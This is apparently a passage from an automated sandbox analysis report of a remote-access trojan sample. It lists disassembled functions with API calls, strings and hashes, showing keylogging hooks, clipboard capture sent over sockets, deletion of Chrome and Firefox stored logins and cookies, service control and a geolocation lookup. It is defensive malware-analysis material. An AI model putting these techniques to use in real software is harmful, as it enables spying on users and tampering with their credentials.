                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                        • FindClose.KERNEL32(00000000), ref: 0040AB0A
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                        • FindClose.KERNEL32(00000000), ref: 0040AC53
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$CloseFile$FirstNext
                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                        • API String ID: 1164774033-3681987949
                        • Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                        • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                        • Opcode Fuzzy Hash: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                        • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                        Function 0040AC78 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                        • FindClose.KERNEL32(00000000), ref: 0040AD0A
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                        • FindClose.KERNEL32(00000000), ref: 0040ADF0
                        • FindClose.KERNEL32(00000000), ref: 0040AE11
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$Close$File$FirstNext
                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                        • API String ID: 3527384056-432212279
                        • Opcode ID: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                        • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                        • Opcode Fuzzy Hash: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                        • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                        Function 00414EC1 Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32 ref: 00414EC2
                        • EmptyClipboard.USER32 ref: 00414ED0
                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                        • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                        • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                        • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                        • CloseClipboard.USER32 ref: 00414F55
                        • OpenClipboard.USER32 ref: 00414F5C
                        • GetClipboardData.USER32(0000000D), ref: 00414F6C
                        • GlobalLock.KERNEL32(00000000), ref: 00414F75
                        • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                        • CloseClipboard.USER32 ref: 00414F84
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                        • String ID:
                        • API String ID: 3520204547-0
                        • Opcode ID: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                        • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                        • Opcode Fuzzy Hash: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                        • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                        Function 004175E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0$1$2$3$4$5$6$7
                        • API String ID: 0-3177665633
                        • Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                        • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                        • Opcode Fuzzy Hash: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                        • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                        Function 004186FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                        • GetLastError.KERNEL32 ref: 00418771
                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                        • String ID:
                        • API String ID: 3587775597-0
                        • Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                        • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                        • Opcode Fuzzy Hash: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                        • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                        Function 0040B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                        • FindClose.KERNEL32(00000000), ref: 0040B3BE
                        • FindClose.KERNEL32(00000000), ref: 0040B3E9
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$CloseFile$FirstNext
                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                        • API String ID: 1164774033-405221262
                        • Opcode ID: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                        • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                        • Opcode Fuzzy Hash: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                        • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                        Function 0041A01B Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
                          • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                        • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                        • String ID:
                        • API String ID: 2341273852-0
                        • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                        • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                        • Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                        • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                        Function 00410763 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                        • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                        • SetLastError.KERNEL32(0000000E), ref: 0041082E
                          • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
                        • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
                        • HeapAlloc.KERNEL32(00000000), ref: 0041087C
                        • SetLastError.KERNEL32(0000045A), ref: 0041098F
                          • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
                          • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                        • String ID: $.F
                        • API String ID: 3950776272-1421728423
                        • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                        • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                        • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                        • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                        Function 00409340 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                        • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                        • GetLastError.KERNEL32 ref: 00409375
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                        • TranslateMessage.USER32(?), ref: 004093D2
                        • DispatchMessageA.USER32(?), ref: 004093DD
                        Strings
                        • Keylogger initialization failure: error , xrefs: 00409389
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                        • String ID: Keylogger initialization failure: error
                        • API String ID: 3219506041-952744263
                        • Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                        • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                        • Opcode Fuzzy Hash: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                        • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                        Function 004128E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                        • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressCloseCreateLibraryLoadProcsend
                        • String ID: SHDeleteKeyW$Shlwapi.dll
                        • API String ID: 2127411465-314212984
                        • Opcode ID: 3a8f36ea34958f1437b96a761794d04628548da7921348726e3bd1b1d4fd3bc5
                        • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                        • Opcode Fuzzy Hash: 3a8f36ea34958f1437b96a761794d04628548da7921348726e3bd1b1d4fd3bc5
                        • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                        Function 004466BF Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 00446741
                        • _free.LIBCMT ref: 00446765
                        • _free.LIBCMT ref: 004468EC
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                        • _free.LIBCMT ref: 00446AB8
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                        • String ID:
                        • API String ID: 314583886-0
                        • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                        • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                        • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                        • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                        Function 0040E18D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 90sleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                          • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
                          • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
                        • Sleep.KERNEL32(00000BB8), ref: 0040E243
                        • ExitProcess.KERNEL32 ref: 0040E2B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseExitOpenProcessQuerySleepValue
                        • String ID: 3.8.0 Pro$override$pth_unenc$!G
                        • API String ID: 2281282204-1386060931
                        • Opcode ID: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                        • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                        • Opcode Fuzzy Hash: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                        • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                        Function 0041936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                        • InternetCloseHandle.WININET(00000000), ref: 00419407
                        • InternetCloseHandle.WININET(00000000), ref: 0041940A
                        Strings
                        • http://geoplugin.net/json.gp, xrefs: 004193A2
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleOpen$FileRead
                        • String ID: http://geoplugin.net/json.gp
                        • API String ID: 3121278467-91888290
                        • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                        • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                        • Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                        • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                        Function 0040A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                        • GetLastError.KERNEL32 ref: 0040A999
                        Strings
                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                        • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                        • UserProfile, xrefs: 0040A95F
                        • [Chrome StoredLogins not found], xrefs: 0040A9B3
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteErrorFileLast
                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        • API String ID: 2018770650-1062637481
                        • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                        • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                        • Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                        • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                        Function 00415C90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                        • GetLastError.KERNEL32 ref: 00415CDB
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                        • String ID: SeShutdownPrivilege
                        • API String ID: 3534403312-3733053543
                        • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                        • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                        • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                        • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                        Function 0040838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                        Download Yara Rule
                        APIs
                        • __EH_prolog.LIBCMT ref: 00408393
                          • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                        • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                          • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                          • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                          • Part of subcall function 00404E06: CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                        • FindClose.KERNEL32(00000000), ref: 004086F4
                          • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                          • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                        • String ID:
                        • API String ID: 1824512719-0
                        • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                        • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                        • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                        • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                        Function 00409468 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32 ref: 0040949C
                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                        • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                        • GetKeyState.USER32(00000010), ref: 004094B8
                        • GetKeyboardState.USER32(?), ref: 004094C5
                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                        • String ID:
                        • API String ID: 3566172867-0
                        • Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                        • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                        • Opcode Fuzzy Hash: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                        • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                        Function 00418A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                        • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                        • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                        • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ManagerStart
                        • String ID:
                        • API String ID: 276877138-0
                        • Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                        • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                        • Opcode Fuzzy Hash: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                        • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                        Function 00417AAB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                          • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Find$CreateFirstNext
                        • String ID: H"G$`'G$`'G
                        • API String ID: 341183262-2774397156
                        • Opcode ID: 753b25ef91f62c10a23852cd7e303c3a05920bb6bbf3c128c8b3a0c8982e454a
                        • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                        • Opcode Fuzzy Hash: 753b25ef91f62c10a23852cd7e303c3a05920bb6bbf3c128c8b3a0c8982e454a
                        • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
